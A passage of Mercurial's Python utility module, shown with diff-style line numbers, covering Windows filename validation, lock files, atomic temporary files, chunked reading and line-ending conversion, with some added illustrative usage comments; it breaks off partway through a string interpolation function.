1809 1815 >>> checkwinfilename(b"foo/bar/bla ")
1810 1816 "filename ends with ' ', which is not allowed on Windows"
1811 1817 >>> checkwinfilename(b"../bar")
1812 1818 >>> checkwinfilename(b"foo\\")
1813 1819 "filename ends with '\\', which is invalid on Windows"
1814 1820 >>> checkwinfilename(b"foo\\/bar")
1815 1821 "directory name ends with '\\', which is invalid on Windows"
1816 1822 '''
1817 1823 if path.endswith('\\'):
1818 1824 return _("filename ends with '\\', which is invalid on Windows")
1819 1825 if '\\/' in path:
1820 1826 return _("directory name ends with '\\', which is invalid on Windows")
1821 1827 for n in path.replace('\\', '/').split('/'):
1822 1828 if not n:
1823 1829 continue
1824 1830 for c in _filenamebytestr(n):
1825 1831 if c in _winreservedchars:
1826 1832 return _("filename contains '%s', which is reserved "
1827 1833 "on Windows") % c
1828 1834 if ord(c) <= 31:
1829 1835 return _("filename contains '%s', which is invalid "
1830 1836 "on Windows") % stringutil.escapestr(c)
1831 1837 base = n.split('.')[0]
1832 1838 if base and base.lower() in _winreservednames:
1833 1839 return _("filename contains '%s', which is reserved "
1834 1840 "on Windows") % base
1835 1841 t = n[-1:]
1836 1842 if t in '. ' and n not in '..':
1837 1843 return _("filename ends with '%s', which is not allowed "
1838 1844 "on Windows") % t
1839 1845
1840 1846 if pycompat.iswindows:
1841 1847 checkosfilename = checkwinfilename
1842 1848 timer = time.clock
1843 1849 else:
1844 1850 checkosfilename = platform.checkosfilename
1845 1851 timer = time.time
1846 1852
1847 1853 if safehasattr(time, "perf_counter"):
1848 1854 timer = time.perf_counter
1849 1855
1850 1856 def makelock(info, pathname):
1851 1857 """Create a lock file atomically if possible
1852 1858
1853 1859 This may leave a stale lock file if symlinks aren't supported and the
1854 1860 process is interrupted by a signal.
1855 1861 """
1856 1862 try:
1857 1863 return os.symlink(info, pathname)
1858 1864 except OSError as why:
1859 1865 if why.errno == errno.EEXIST:
1860 1866 raise
1861 1867 except AttributeError: # no symlink in os
1862 1868 pass
1863 1869
1864 1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1865 1871 ld = os.open(pathname, flags)
1866 1872 os.write(ld, info)
1867 1873 os.close(ld)
1868 1874
1869 1875 def readlock(pathname):
1870 1876 try:
1871 1877 return readlink(pathname)
1872 1878 except OSError as why:
1873 1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1874 1880 raise
1875 1881 except AttributeError: # no symlink in os
1876 1882 pass
1877 1883 with posixfile(pathname, 'rb') as fp:
1878 1884 return fp.read()
1879 1885
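# Illustrative sketch of the lock round trip (the path is hypothetical):
# where symlinks exist, the symlink target doubles as the lock payload;
# otherwise a regular file holds the same bytes:
#
#   makelock(b'hostname:1234', b'.hg/store/lock-demo')
#   readlock(b'.hg/store/lock-demo')   # -> b'hostname:1234'
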
1880 1886 def fstat(fp):
1881 1887 '''stat file object that may not have fileno method.'''
1882 1888 try:
1883 1889 return os.fstat(fp.fileno())
1884 1890 except AttributeError:
1885 1891 return os.stat(fp.name)
1886 1892
1887 1893 # File system features
1888 1894
1889 1895 def fscasesensitive(path):
1890 1896 """
1891 1897 Return true if the given path is on a case-sensitive filesystem
1892 1898
1893 1899 Requires a path (like /foo/.hg) ending with a foldable final
1894 1900 directory component.
1895 1901 """
1896 1902 s1 = os.lstat(path)
1897 1903 d, b = os.path.split(path)
1898 1904 b2 = b.upper()
1899 1905 if b == b2:
1900 1906 b2 = b.lower()
1901 1907 if b == b2:
1902 1908 return True # no evidence against case sensitivity
1903 1909 p2 = os.path.join(d, b2)
1904 1910 try:
1905 1911 s2 = os.lstat(p2)
1906 1912 if s2 == s1:
1907 1913 return False
1908 1914 return True
1909 1915 except OSError:
1910 1916 return True
1911 1917
1912 1918 try:
1913 1919 import re2
1914 1920 _re2 = None
1915 1921 except ImportError:
1916 1922 _re2 = False
1917 1923
1918 1924 class _re(object):
1919 1925 def _checkre2(self):
1920 1926 global _re2
1921 1927 try:
1922 1928 # check if match works, see issue3964
1923 1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1924 1930 except ImportError:
1925 1931 _re2 = False
1926 1932
1927 1933 def compile(self, pat, flags=0):
1928 1934 '''Compile a regular expression, using re2 if possible
1929 1935
1930 1936 For best performance, use only re2-compatible regexp features. The
1931 1937 only flags from the re module that are re2-compatible are
1932 1938 IGNORECASE and MULTILINE.'''
1933 1939 if _re2 is None:
1934 1940 self._checkre2()
1935 1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1936 1942 if flags & remod.IGNORECASE:
1937 1943 pat = '(?i)' + pat
1938 1944 if flags & remod.MULTILINE:
1939 1945 pat = '(?m)' + pat
1940 1946 try:
1941 1947 return re2.compile(pat)
1942 1948 except re2.error:
1943 1949 pass
1944 1950 return remod.compile(pat, flags)
1945 1951
1946 1952 @propertycache
1947 1953 def escape(self):
1948 1954 '''Return the version of escape corresponding to self.compile.
1949 1955
1950 1956 This is imperfect because whether re2 or re is used for a particular
1951 1957 function depends on the flags, etc, but it's the best we can do.
1952 1958 '''
1953 1959 global _re2
1954 1960 if _re2 is None:
1955 1961 self._checkre2()
1956 1962 if _re2:
1957 1963 return re2.escape
1958 1964 else:
1959 1965 return remod.escape
1960 1966
1961 1967 re = _re()
1962 1968
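# Illustrative sketch: callers use the module-level instance much like the
# re module; only IGNORECASE and MULTILINE survive the re2 fast path:
#
#   pat = re.compile(br'^[a-f0-9]+$', remod.IGNORECASE)
#   bool(pat.match(b'DEADBEEF'))   # -> True, via re2 when it is available
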
1963 1969 _fspathcache = {}
1964 1970 def fspath(name, root):
1965 1971 '''Get name in the case stored in the filesystem
1966 1972
1967 1973 The name should be relative to root, and be normcase-ed for efficiency.
1968 1974
1969 1975 Note that this function is unnecessary, and should not be
1970 1976 called, for case-sensitive filesystems (simply because it's expensive).
1971 1977
1972 1978 The root should be normcase-ed, too.
1973 1979 '''
1974 1980 def _makefspathcacheentry(dir):
1975 1981 return dict((normcase(n), n) for n in os.listdir(dir))
1976 1982
1977 1983 seps = pycompat.ossep
1978 1984 if pycompat.osaltsep:
1979 1985 seps = seps + pycompat.osaltsep
1980 1986 # Protect backslashes. This gets silly very quickly.
1981 1987 seps = seps.replace('\\', '\\\\')
1982 1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1983 1989 dir = os.path.normpath(root)
1984 1990 result = []
1985 1991 for part, sep in pattern.findall(name):
1986 1992 if sep:
1987 1993 result.append(sep)
1988 1994 continue
1989 1995
1990 1996 if dir not in _fspathcache:
1991 1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1992 1998 contents = _fspathcache[dir]
1993 1999
1994 2000 found = contents.get(part)
1995 2001 if not found:
1996 2002 # retry "once per directory" per "dirstate.walk" which
1997 2003 # may take place for each patch of "hg qpush", for example
1998 2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1999 2005 found = contents.get(part)
2000 2006
2001 2007 result.append(found or part)
2002 2008 dir = os.path.join(dir, part)
2003 2009
2004 2010 return ''.join(result)
2005 2011
2006 2012 def checknlink(testfile):
2007 2013 '''check whether hardlink count reporting works properly'''
2008 2014
2009 2015 # testfile may be open, so we need a separate file for checking to
2010 2016 # work around issue2543 (or testfile may get lost on Samba shares)
2011 2017 f1, f2, fp = None, None, None
2012 2018 try:
2013 2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2014 2020 suffix='1~', dir=os.path.dirname(testfile))
2015 2021 os.close(fd)
2016 2022 f2 = '%s2~' % f1[:-2]
2017 2023
2018 2024 oslink(f1, f2)
2019 2025 # nlinks() may behave differently for files on Windows shares if
2020 2026 # the file is open.
2021 2027 fp = posixfile(f2)
2022 2028 return nlinks(f2) > 1
2023 2029 except OSError:
2024 2030 return False
2025 2031 finally:
2026 2032 if fp is not None:
2027 2033 fp.close()
2028 2034 for f in (f1, f2):
2029 2035 try:
2030 2036 if f is not None:
2031 2037 os.unlink(f)
2032 2038 except OSError:
2033 2039 pass
2034 2040
2035 2041 def endswithsep(path):
2036 2042 '''Check path ends with os.sep or os.altsep.'''
2037 2043 return (path.endswith(pycompat.ossep)
2038 2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2039 2045
2040 2046 def splitpath(path):
2041 2047 '''Split path by os.sep.
2042 2048 Note that this function does not use os.altsep because this is
2043 2049 an alternative to a simple "xxx.split(os.sep)".
2044 2050 It is recommended to use os.path.normpath() before using this
2045 2051 function if needed.'''
2046 2052 return path.split(pycompat.ossep)
2047 2053
2048 2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2049 2055 """Create a temporary file with the same contents from name
2050 2056
2051 2057 The permission bits are copied from the original file.
2052 2058
2053 2059 If the temporary file is going to be truncated immediately, you
2054 2060 can use emptyok=True as an optimization.
2055 2061
2056 2062 Returns the name of the temporary file.
2057 2063 """
2058 2064 d, fn = os.path.split(name)
2059 2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2060 2066 os.close(fd)
2061 2067 # Temporary files are created with mode 0600, which is usually not
2062 2068 # what we want. If the original file already exists, just copy
2063 2069 # its mode. Otherwise, manually obey umask.
2064 2070 copymode(name, temp, createmode, enforcewritable)
2065 2071
2066 2072 if emptyok:
2067 2073 return temp
2068 2074 try:
2069 2075 try:
2070 2076 ifp = posixfile(name, "rb")
2071 2077 except IOError as inst:
2072 2078 if inst.errno == errno.ENOENT:
2073 2079 return temp
2074 2080 if not getattr(inst, 'filename', None):
2075 2081 inst.filename = name
2076 2082 raise
2077 2083 ofp = posixfile(temp, "wb")
2078 2084 for chunk in filechunkiter(ifp):
2079 2085 ofp.write(chunk)
2080 2086 ifp.close()
2081 2087 ofp.close()
2082 2088 except: # re-raises
2083 2089 try:
2084 2090 os.unlink(temp)
2085 2091 except OSError:
2086 2092 pass
2087 2093 raise
2088 2094 return temp
2089 2095
2090 2096 class filestat(object):
2091 2097 """help to exactly detect change of a file
2092 2098
2093 2099 The 'stat' attribute is the result of 'os.stat()' if the specified
2094 2100 'path' exists. Otherwise, it is None. This saves callers of this
2095 2101 class a preparatory 'exists()' check.
2096 2102 """
2097 2103 def __init__(self, stat):
2098 2104 self.stat = stat
2099 2105
2100 2106 @classmethod
2101 2107 def frompath(cls, path):
2102 2108 try:
2103 2109 stat = os.stat(path)
2104 2110 except OSError as err:
2105 2111 if err.errno != errno.ENOENT:
2106 2112 raise
2107 2113 stat = None
2108 2114 return cls(stat)
2109 2115
2110 2116 @classmethod
2111 2117 def fromfp(cls, fp):
2112 2118 stat = os.fstat(fp.fileno())
2113 2119 return cls(stat)
2114 2120
2115 2121 __hash__ = object.__hash__
2116 2122
2117 2123 def __eq__(self, old):
2118 2124 try:
2119 2125 # if ambiguity between stat of new and old file is
2120 2126 # avoided, comparison of size, ctime and mtime is enough
2121 2127 # to exactly detect change of a file regardless of platform
2122 2128 return (self.stat.st_size == old.stat.st_size and
2123 2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2124 2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2125 2131 except AttributeError:
2126 2132 pass
2127 2133 try:
2128 2134 return self.stat is None and old.stat is None
2129 2135 except AttributeError:
2130 2136 return False
2131 2137
2132 2138 def isambig(self, old):
2133 2139 """Examine whether new (= self) stat is ambiguous against old one
2134 2140
2135 2141 "S[N]" below means stat of a file at N-th change:
2136 2142
2137 2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2138 2144 - S[n-1].ctime == S[n].ctime
2139 2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2140 2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2141 2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2142 2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2143 2149
2144 2150 Case (*2) above means that a file was changed twice or more at
2145 2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2146 2152 is ambiguous.
2147 2153
2148 2154 The basic idea to avoid such ambiguity is "advance mtime by 1 sec,
2149 2155 if the timestamp is ambiguous".
2150 2156
2151 2157 But advancing mtime only in case (*2) doesn't work as
2152 2158 expected, because naturally advanced S[n].mtime in case (*1)
2153 2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2154 2160
2155 2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2156 2162 treated as ambiguous regardless of mtime, to avoid overlooking
2157 2163 changes because of collisions between such mtimes.
2158 2164
2159 2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2160 2166 S[n].mtime", even if size of a file isn't changed.
2161 2167 """
2162 2168 try:
2163 2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2164 2170 except AttributeError:
2165 2171 return False
2166 2172
2167 2173 def avoidambig(self, path, old):
2168 2174 """Change file stat of specified path to avoid ambiguity
2169 2175
2170 2176 'old' should be previous filestat of 'path'.
2171 2177
2172 2178 This skips avoiding ambiguity, if a process doesn't have
2173 2179 appropriate privileges for 'path'. This returns False in this
2174 2180 case.
2175 2181
2176 2182 Otherwise, this returns True, as "ambiguity is avoided".
2177 2183 """
2178 2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2179 2185 try:
2180 2186 os.utime(path, (advanced, advanced))
2181 2187 except OSError as inst:
2182 2188 if inst.errno == errno.EPERM:
2183 2189 # utime() on the file created by another user causes EPERM,
2184 2190 # if a process doesn't have appropriate privileges
2185 2191 return False
2186 2192 raise
2187 2193 return True
2188 2194
2189 2195 def __ne__(self, other):
2190 2196 return not self == other
2191 2197
2192 2198 class atomictempfile(object):
2193 2199 '''writable file object that atomically updates a file
2194 2200
2195 2201 All writes will go to a temporary copy of the original file. Call
2196 2202 close() when you are done writing, and atomictempfile will rename
2197 2203 the temporary copy to the original name, making the changes
2198 2204 visible. If the object is destroyed without being closed, all your
2199 2205 writes are discarded.
2200 2206
2201 2207 checkambig argument of constructor is used with filestat, and is
2202 2208 useful only if target file is guarded by any lock (e.g. repo.lock
2203 2209 or repo.wlock).
2204 2210 '''
2205 2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2206 2212 self.__name = name # permanent name
2207 2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2208 2214 createmode=createmode,
2209 2215 enforcewritable=('w' in mode))
2210 2216
2211 2217 self._fp = posixfile(self._tempname, mode)
2212 2218 self._checkambig = checkambig
2213 2219
2214 2220 # delegated methods
2215 2221 self.read = self._fp.read
2216 2222 self.write = self._fp.write
2217 2223 self.seek = self._fp.seek
2218 2224 self.tell = self._fp.tell
2219 2225 self.fileno = self._fp.fileno
2220 2226
2221 2227 def close(self):
2222 2228 if not self._fp.closed:
2223 2229 self._fp.close()
2224 2230 filename = localpath(self.__name)
2225 2231 oldstat = self._checkambig and filestat.frompath(filename)
2226 2232 if oldstat and oldstat.stat:
2227 2233 rename(self._tempname, filename)
2228 2234 newstat = filestat.frompath(filename)
2229 2235 if newstat.isambig(oldstat):
2230 2236 # stat of changed file is ambiguous to original one
2231 2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2232 2238 os.utime(filename, (advanced, advanced))
2233 2239 else:
2234 2240 rename(self._tempname, filename)
2235 2241
2236 2242 def discard(self):
2237 2243 if not self._fp.closed:
2238 2244 try:
2239 2245 os.unlink(self._tempname)
2240 2246 except OSError:
2241 2247 pass
2242 2248 self._fp.close()
2243 2249
2244 2250 def __del__(self):
2245 2251 if safehasattr(self, '_fp'): # constructor actually did something
2246 2252 self.discard()
2247 2253
2248 2254 def __enter__(self):
2249 2255 return self
2250 2256
2251 2257 def __exit__(self, exctype, excvalue, traceback):
2252 2258 if exctype is not None:
2253 2259 self.discard()
2254 2260 else:
2255 2261 self.close()
2256 2262
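# Illustrative sketch: as a context manager, atomictempfile renames the
# temporary file over the target on a clean exit and discards it when an
# exception escapes the block (the target name is hypothetical):
#
#   with atomictempfile(b'requires-demo') as fp:
#       fp.write(b'content\n')
#   # the write is now visible atomically under b'requires-demo'
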
2257 2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2258 2264 """unlink and remove the directory if it is empty"""
2259 2265 if ignoremissing:
2260 2266 tryunlink(f)
2261 2267 else:
2262 2268 unlink(f)
2263 2269 if rmdir:
2264 2270 # try removing directories that might now be empty
2265 2271 try:
2266 2272 removedirs(os.path.dirname(f))
2267 2273 except OSError:
2268 2274 pass
2269 2275
2270 2276 def tryunlink(f):
2271 2277 """Attempt to remove a file, ignoring ENOENT errors."""
2272 2278 try:
2273 2279 unlink(f)
2274 2280 except OSError as e:
2275 2281 if e.errno != errno.ENOENT:
2276 2282 raise
2277 2283
2278 2284 def makedirs(name, mode=None, notindexed=False):
2279 2285 """recursive directory creation with parent mode inheritance
2280 2286
2281 2287 Newly created directories are marked as "not to be indexed by
2282 2288 the content indexing service", if ``notindexed`` is specified
2283 2289 for "write" mode access.
2284 2290 """
2285 2291 try:
2286 2292 makedir(name, notindexed)
2287 2293 except OSError as err:
2288 2294 if err.errno == errno.EEXIST:
2289 2295 return
2290 2296 if err.errno != errno.ENOENT or not name:
2291 2297 raise
2292 2298 parent = os.path.dirname(os.path.abspath(name))
2293 2299 if parent == name:
2294 2300 raise
2295 2301 makedirs(parent, mode, notindexed)
2296 2302 try:
2297 2303 makedir(name, notindexed)
2298 2304 except OSError as err:
2299 2305 # Catch EEXIST to handle races
2300 2306 if err.errno == errno.EEXIST:
2301 2307 return
2302 2308 raise
2303 2309 if mode is not None:
2304 2310 os.chmod(name, mode)
2305 2311
2306 2312 def readfile(path):
2307 2313 with open(path, 'rb') as fp:
2308 2314 return fp.read()
2309 2315
2310 2316 def writefile(path, text):
2311 2317 with open(path, 'wb') as fp:
2312 2318 fp.write(text)
2313 2319
2314 2320 def appendfile(path, text):
2315 2321 with open(path, 'ab') as fp:
2316 2322 fp.write(text)
2317 2323
2318 2324 class chunkbuffer(object):
2319 2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2320 2326 iterator over chunks of arbitrary size."""
2321 2327
2322 2328 def __init__(self, in_iter):
2323 2329 """in_iter is the iterator that's iterating over the input chunks."""
2324 2330 def splitbig(chunks):
2325 2331 for chunk in chunks:
2326 2332 if len(chunk) > 2**20:
2327 2333 pos = 0
2328 2334 while pos < len(chunk):
2329 2335 end = pos + 2 ** 18
2330 2336 yield chunk[pos:end]
2331 2337 pos = end
2332 2338 else:
2333 2339 yield chunk
2334 2340 self.iter = splitbig(in_iter)
2335 2341 self._queue = collections.deque()
2336 2342 self._chunkoffset = 0
2337 2343
2338 2344 def read(self, l=None):
2339 2345 """Read L bytes of data from the iterator of chunks of data.
2340 2346 Returns less than L bytes if the iterator runs dry.
2341 2347
2342 2348 If the size parameter is omitted, read everything"""
2343 2349 if l is None:
2344 2350 return ''.join(self.iter)
2345 2351
2346 2352 left = l
2347 2353 buf = []
2348 2354 queue = self._queue
2349 2355 while left > 0:
2350 2356 # refill the queue
2351 2357 if not queue:
2352 2358 target = 2**18
2353 2359 for chunk in self.iter:
2354 2360 queue.append(chunk)
2355 2361 target -= len(chunk)
2356 2362 if target <= 0:
2357 2363 break
2358 2364 if not queue:
2359 2365 break
2360 2366
2361 2367 # The easy way to do this would be to queue.popleft(), modify the
2362 2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2363 2369 # where we read partial chunk content, this incurs 2 dequeue
2364 2370 # mutations and creates a new str for the remaining chunk in the
2365 2371 # queue. Our code below avoids this overhead.
2366 2372
2367 2373 chunk = queue[0]
2368 2374 chunkl = len(chunk)
2369 2375 offset = self._chunkoffset
2370 2376
2371 2377 # Use full chunk.
2372 2378 if offset == 0 and left >= chunkl:
2373 2379 left -= chunkl
2374 2380 queue.popleft()
2375 2381 buf.append(chunk)
2376 2382 # self._chunkoffset remains at 0.
2377 2383 continue
2378 2384
2379 2385 chunkremaining = chunkl - offset
2380 2386
2381 2387 # Use all of unconsumed part of chunk.
2382 2388 if left >= chunkremaining:
2383 2389 left -= chunkremaining
2384 2390 queue.popleft()
2385 2391 # offset == 0 is enabled by block above, so this won't merely
2386 2392 # copy via ``chunk[0:]``.
2387 2393 buf.append(chunk[offset:])
2388 2394 self._chunkoffset = 0
2389 2395
2390 2396 # Partial chunk needed.
2391 2397 else:
2392 2398 buf.append(chunk[offset:offset + left])
2393 2399 self._chunkoffset += left
2394 2400 left -= chunkremaining
2395 2401
2396 2402 return ''.join(buf)
2397 2403
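# Illustrative sketch: chunkbuffer rechunks an iterator into exact sizes;
# note that read() with no size drains only the unqueued remainder of the
# source iterator:
#
#   cb = chunkbuffer(iter([b'abc', b'def', b'g']))
#   cb.read(4)   # -> b'abcd'
#   cb.read(3)   # -> b'efg'
#   cb.read(1)   # -> b'' (source exhausted)
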
2398 2404 def filechunkiter(f, size=131072, limit=None):
2399 2405 """Create a generator that produces the data in the file size
2400 2406 (default 131072) bytes at a time, up to optional limit (default is
2401 2407 to read all data). Chunks may be less than size bytes if the
2402 2408 chunk is the last chunk in the file, or the file is a socket or
2403 2409 some other type of file that sometimes reads less data than is
2404 2410 requested."""
2405 2411 assert size >= 0
2406 2412 assert limit is None or limit >= 0
2407 2413 while True:
2408 2414 if limit is None:
2409 2415 nbytes = size
2410 2416 else:
2411 2417 nbytes = min(limit, size)
2412 2418 s = nbytes and f.read(nbytes)
2413 2419 if not s:
2414 2420 break
2415 2421 if limit:
2416 2422 limit -= len(s)
2417 2423 yield s
2418 2424
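# Illustrative sketch, using the module's stringio alias:
#
#   list(filechunkiter(stringio(b'abcdef'), size=4))   # -> [b'abcd', b'ef']
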
2419 2425 class cappedreader(object):
2420 2426 """A file object proxy that allows reading up to N bytes.
2421 2427
2422 2428 Given a source file object, instances of this type allow reading up to
2423 2429 N bytes from that source file object. Attempts to read past the allowed
2424 2430 limit are treated as EOF.
2425 2431
2426 2432 It is assumed that I/O is not performed on the original file object
2427 2433 in addition to I/O that is performed by this instance. If there is,
2428 2434 state tracking will get out of sync and unexpected results will ensue.
2429 2435 """
2430 2436 def __init__(self, fh, limit):
2431 2437 """Allow reading up to <limit> bytes from <fh>."""
2432 2438 self._fh = fh
2433 2439 self._left = limit
2434 2440
2435 2441 def read(self, n=-1):
2436 2442 if not self._left:
2437 2443 return b''
2438 2444
2439 2445 if n < 0:
2440 2446 n = self._left
2441 2447
2442 2448 data = self._fh.read(min(n, self._left))
2443 2449 self._left -= len(data)
2444 2450 assert self._left >= 0
2445 2451
2446 2452 return data
2447 2453
2448 2454 def readinto(self, b):
2449 2455 res = self.read(len(b))
2450 2456 if res is None:
2451 2457 return None
2452 2458
2453 2459 b[0:len(res)] = res
2454 2460 return len(res)
2455 2461
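# Illustrative sketch: reads beyond the cap simply behave like EOF:
#
#   r = cappedreader(stringio(b'0123456789'), 4)
#   r.read()   # -> b'0123'
#   r.read()   # -> b''
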
2456 2462 def unitcountfn(*unittable):
2457 2463 '''return a function that renders a readable count of some quantity'''
2458 2464
2459 2465 def go(count):
2460 2466 for multiplier, divisor, format in unittable:
2461 2467 if abs(count) >= divisor * multiplier:
2462 2468 return format % (count / float(divisor))
2463 2469 return unittable[-1][2] % count
2464 2470
2465 2471 return go
2466 2472
2467 2473 def processlinerange(fromline, toline):
2468 2474 """Check that linerange <fromline>:<toline> makes sense and return a
2469 2475 0-based range.
2470 2476
2471 2477 >>> processlinerange(10, 20)
2472 2478 (9, 20)
2473 2479 >>> processlinerange(2, 1)
2474 2480 Traceback (most recent call last):
2475 2481 ...
2476 2482 ParseError: line range must be positive
2477 2483 >>> processlinerange(0, 5)
2478 2484 Traceback (most recent call last):
2479 2485 ...
2480 2486 ParseError: fromline must be strictly positive
2481 2487 """
2482 2488 if toline - fromline < 0:
2483 2489 raise error.ParseError(_("line range must be positive"))
2484 2490 if fromline < 1:
2485 2491 raise error.ParseError(_("fromline must be strictly positive"))
2486 2492 return fromline - 1, toline
2487 2493
2488 2494 bytecount = unitcountfn(
2489 2495 (100, 1 << 30, _('%.0f GB')),
2490 2496 (10, 1 << 30, _('%.1f GB')),
2491 2497 (1, 1 << 30, _('%.2f GB')),
2492 2498 (100, 1 << 20, _('%.0f MB')),
2493 2499 (10, 1 << 20, _('%.1f MB')),
2494 2500 (1, 1 << 20, _('%.2f MB')),
2495 2501 (100, 1 << 10, _('%.0f KB')),
2496 2502 (10, 1 << 10, _('%.1f KB')),
2497 2503 (1, 1 << 10, _('%.2f KB')),
2498 2504 (1, 1, _('%.0f bytes')),
2499 2505 )
2500 2506
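# Illustrative sketch (assuming the default untranslated format strings):
#
#   bytecount(1 << 20)   # -> b'1.00 MB'
#   bytecount(2048)      # -> b'2.00 KB'
#   bytecount(7)         # -> b'7 bytes'
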
2501 2507 class transformingwriter(object):
2502 2508 """Writable file wrapper to transform data by function"""
2503 2509
2504 2510 def __init__(self, fp, encode):
2505 2511 self._fp = fp
2506 2512 self._encode = encode
2507 2513
2508 2514 def close(self):
2509 2515 self._fp.close()
2510 2516
2511 2517 def flush(self):
2512 2518 self._fp.flush()
2513 2519
2514 2520 def write(self, data):
2515 2521 return self._fp.write(self._encode(data))
2516 2522
2517 2523 # Matches a single EOL which can either be a CRLF where repeated CR
2518 2524 # are removed or an LF. We do not care about old Macintosh files, so a
2519 2525 # stray CR is an error.
2520 2526 _eolre = remod.compile(br'\r*\n')
2521 2527
2522 2528 def tolf(s):
2523 2529 return _eolre.sub('\n', s)
2524 2530
2525 2531 def tocrlf(s):
2526 2532 return _eolre.sub('\r\n', s)
2527 2533
2528 2534 def _crlfwriter(fp):
2529 2535 return transformingwriter(fp, tocrlf)
2530 2536
2531 2537 if pycompat.oslinesep == '\r\n':
2532 2538 tonativeeol = tocrlf
2533 2539 fromnativeeol = tolf
2534 2540 nativeeolwriter = _crlfwriter
2535 2541 else:
2536 2542 tonativeeol = pycompat.identity
2537 2543 fromnativeeol = pycompat.identity
2538 2544 nativeeolwriter = pycompat.identity
2539 2545
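# Illustrative sketch of the EOL helpers (stray CRs before an LF collapse):
#
#   tolf(b'a\r\nb\n')     # -> b'a\nb\n'
#   tocrlf(b'a\nb\r\n')   # -> b'a\r\nb\r\n'
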
2540 2546 if (pyplatform.python_implementation() == 'CPython' and
2541 2547 sys.version_info < (3, 0)):
2542 2548 # There is an issue in CPython that some IO methods do not handle EINTR
2543 2549 # correctly. The following table shows what CPython version (and functions)
2544 2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2545 2551 #
2546 2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2547 2553 # --------------------------------------------------
2548 2554 # fp.__iter__ | buggy | buggy | okay
2549 2555 # fp.read* | buggy | okay [1] | okay
2550 2556 #
2551 2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2552 2558 #
2553 2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2554 2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2555 2561 #
2556 2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2557 2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2558 2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2559 2565 # fp.__iter__ but not other fp.read* methods.
2560 2566 #
2561 2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2562 2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2563 2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2564 2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2565 2571 # to minimize the performance impact.
2566 2572 if sys.version_info >= (2, 7, 4):
2567 2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2568 2574 def _safeiterfile(fp):
2569 2575 return iter(fp.readline, '')
2570 2576 else:
2571 2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2572 2578 # note: this may block longer than necessary because of bufsize.
2573 2579 def _safeiterfile(fp, bufsize=4096):
2574 2580 fd = fp.fileno()
2575 2581 line = ''
2576 2582 while True:
2577 2583 try:
2578 2584 buf = os.read(fd, bufsize)
2579 2585 except OSError as ex:
2580 2586 # os.read only raises EINTR before any data is read
2581 2587 if ex.errno == errno.EINTR:
2582 2588 continue
2583 2589 else:
2584 2590 raise
2585 2591 line += buf
2586 2592 if '\n' in buf:
2587 2593 splitted = line.splitlines(True)
2588 2594 line = ''
2589 2595 for l in splitted:
2590 2596 if l[-1] == '\n':
2591 2597 yield l
2592 2598 else:
2593 2599 line = l
2594 2600 if not buf:
2595 2601 break
2596 2602 if line:
2597 2603 yield line
2598 2604
2599 2605 def iterfile(fp):
2600 2606 fastpath = True
2601 2607 if type(fp) is file:
2602 2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2603 2609 if fastpath:
2604 2610 return fp
2605 2611 else:
2606 2612 return _safeiterfile(fp)
2607 2613 else:
2608 2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2609 2615 def iterfile(fp):
2610 2616 return fp
2611 2617
2612 2618 def iterlines(iterator):
2613 2619 for chunk in iterator:
2614 2620 for line in chunk.splitlines():
2615 2621 yield line
2616 2622
2617 2623 def expandpath(path):
2618 2624 return os.path.expanduser(os.path.expandvars(path))
2619 2625
2620 2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2621 2627 """Return the result of interpolating items in the mapping into string s.
2622 2628
2623 2629 prefix is a single character string, or a two character string with
2624 2630 a backslash as the first character if the prefix needs to be escaped in
2625 2631 a regular expression.
2626 2632
2627 2633 fn is an optional function that will be applied to the replacement text
2628 2634 just before replacement.
2629 2635
2630 2636 escape_prefix is an optional flag that allows using doubled prefix for
2631 2637 its escaping.
2632 2638 """
2633 2639 fn = fn or (lambda s: s)
